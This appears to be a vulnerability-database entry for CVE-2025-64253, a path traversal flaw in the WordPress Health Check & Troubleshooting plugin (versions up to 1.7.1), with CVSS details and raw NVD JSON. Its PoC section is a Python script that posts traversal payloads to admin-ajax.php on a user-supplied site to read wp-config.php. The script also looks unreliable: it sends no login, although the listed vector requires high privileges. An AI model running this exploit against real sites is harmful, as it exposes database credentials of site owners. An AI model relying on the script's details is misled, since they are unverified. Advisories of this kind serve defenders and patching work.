Security Vulnerability Report
中文
CVE-2025-64253 CVSS 4.9 MEDIUM

CVE-2025-64253

Published: 2025-12-16 09:15:55
Last Modified: 2026-04-15 00:35:42

Description

Path Traversal: '.../...//' vulnerability in WordPress.org Health Check & Troubleshooting health-check allows Path Traversal.This issue affects Health Check & Troubleshooting: from n/a through <= 1.7.1.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Health Check & Troubleshooting plugin <= 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64253 PoC - WordPress Health Check Path Traversal # Affected: WordPress Health Check & Troubleshooting plugin <= 1.7.1 import requests import sys from urllib.parse import quote target = input("Enter target URL: ").rstrip('/') # Path traversal payloads payloads = [ ".../...//wp-config.php", ".../...//.../...//wp-config.php", "..%2F..%2Fwp-config.php", "....//....//wp-config.php" ] # Try to exploit via Health Check endpoint for payload in payloads: url = f"{target}/wp-admin/admin-ajax.php" data = { "action": "health_check_get_contents", "file": payload } print(f"[*] Testing payload: {payload}") try: response = requests.post(url, data=data, timeout=10) if response.status_code == 200 and "<?php" in response.text: print(f"[!] Vulnerable! Found file content:") print(response.text[:500]) except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64253", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:55.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal: '.../...//' vulnerability in WordPress.org Health Check & Troubleshooting health-check allows Path Traversal.This issue affects Health Check & Troubleshooting: from n/a through <= 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/health-check/vulnerability/wordpress-health-check-troubleshooting-plugin-1-7-1-path-traversal-vulnerability?_s_id=cve", "source": "[email protected]"}]}}